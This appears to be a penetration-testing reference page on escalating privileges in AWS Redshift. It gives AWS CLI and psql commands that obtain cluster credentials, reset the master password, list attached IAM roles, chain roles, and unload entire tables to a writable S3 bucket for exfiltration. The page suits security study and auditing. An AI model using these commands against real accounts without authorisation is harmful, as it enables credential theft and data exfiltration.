# AWS - Redshift Privesc
## Redshift
For more information about Redshift check:
{% content-ref url="../aws-services/aws-redshift-enum.md" %}
[aws-redshift-enum.md](../aws-services/aws-redshift-enum.md)
{% endcontent-ref %}
### `redshift:DescribeClusters`, `redshift:GetClusterCredentials`
With these permissions you can get **info about all the clusters** (including the name and the cluster username) and **get credentials** to access them:
```bash
# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect; even though the password looks like a base64 string, that is the actual password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:postgres" -d template1 -p 5439
```
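Since both the cluster identifier and the endpoint/master username come from `redshift:DescribeClusters`, the two calls can be chained. A minimal sketch of that workflow, reusing the example cluster above and assuming `jq` is available:
```bash
# Enumerate clusters to grab the identifier, endpoint and master username
aws redshift describe-clusters \
  --query 'Clusters[].{Id:ClusterIdentifier,User:MasterUsername,Endpoint:Endpoint.Address,Port:Endpoint.Port}'

# Request temporary credentials and feed them straight into psql
CREDS=$(aws redshift get-cluster-credentials \
  --db-user postgres --cluster-identifier redshift-cluster-1 --output json)
PGPASSWORD=$(echo "$CREDS" | jq -r .DbPassword) \
  psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com \
       -U "$(echo "$CREDS" | jq -r .DbUser)" -d template1 -p 5439
```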
**Potential Impact:** Find sensitive info inside the databases.
### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`
With these permissions you can get **info about all the clusters** and **get credentials** to access them.\
Note that the database user will have the **permissions of the IAM identity** that was used to get the credentials.
```bash
# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect; even though the password looks like a base64 string, that is the actual password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439
```
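Once connected, a quick way to start hunting for sensitive data is to list the available databases and user tables. A hedged sketch reusing the connection parameters from the example above (psql will prompt for the `DbPassword` returned by the previous call):
```bash
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com \
     -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 \
     -c 'SELECT datname FROM pg_database;' \
     -c "SELECT schemaname, tablename FROM pg_tables WHERE schemaname NOT IN ('pg_catalog','information_schema');"
```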
**Potential Impact:** Find sensitive info inside the databases.
### `redshift:DescribeClusters`, `redshift:ModifyCluster?`
It's possible to **modify the master password** of the internal postgres (Redshift) user from the AWS CLI (I think these are the permissions you need but I haven't tested them yet):
```bash
aws redshift modify-cluster --cluster-identifier <cluster-identifier> --master-user-password '<master-password>'
```
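If the change goes through, you can then log in directly as the master user with the password you just set (the endpoint and master username being the hypothetical values recovered via `redshift:DescribeClusters`):
```bash
# Placeholders: fill in with the values from describe-clusters
PGPASSWORD='<master-password>' psql -h <cluster-endpoint> \
  -U <master-username> -d template1 -p 5439
```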
**Potential Impact:** Find sensitive info inside the databases.
## Accessing External Services
{% hint style="warning" %}
To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have a list of AWS roles attached** that you can use **if you know the ARN**, or you can simply specify "**default**" to use the default one assigned.
Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows you to **chain roles** (as long as each one can assume the next) to gain further access, just by **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`
{% endhint %}
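To know which role ARNs you can pass to `iam_role`, you can list the roles attached to each cluster (again via `redshift:DescribeClusters`):
```bash
# List the IAM roles attached to each cluster and the default one
aws redshift describe-clusters \
  --query 'Clusters[].{Id:ClusterIdentifier,Roles:IamRoles[].IamRoleArn,Default:DefaultIamRoleArn}'
```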
### Lambdas
As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r\_CREATE\_EXTERNAL\_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like:
```sql
CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;
```
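Once created, the external function is invoked like any regular SQL function, and Redshift calls the Lambda using the attached (or default) role. A hedged usage sketch from psql, with hypothetical connection parameters:
```bash
psql -h <cluster-endpoint> -U '<db-user>' -d template1 -p 5439 \
  -c 'SELECT exfunc_sum2(1,2);'
```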
### S3
As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**:
```sql
-- Read
copy <table_name> from 's3://<bucket_name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

-- Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;
```
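From an attacker's perspective, the same `unload` primitive can be used to exfiltrate whole tables to a bucket that one of the attached roles can write to. A hedged sketch run through psql, with hypothetical table and bucket names:
```bash
psql -h <cluster-endpoint> -U '<db-user>' -d template1 -p 5439 \
  -c "unload ('select * from <table>') to 's3://<writable-bucket>/exfil/' iam_role default;"
```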
### Dynamo
As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t\_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from DynamoDB**:
```sql
copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';
```
{% hint style="warning" %}
The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located.
{% endhint %}
### EMR
Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html)
## References
* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)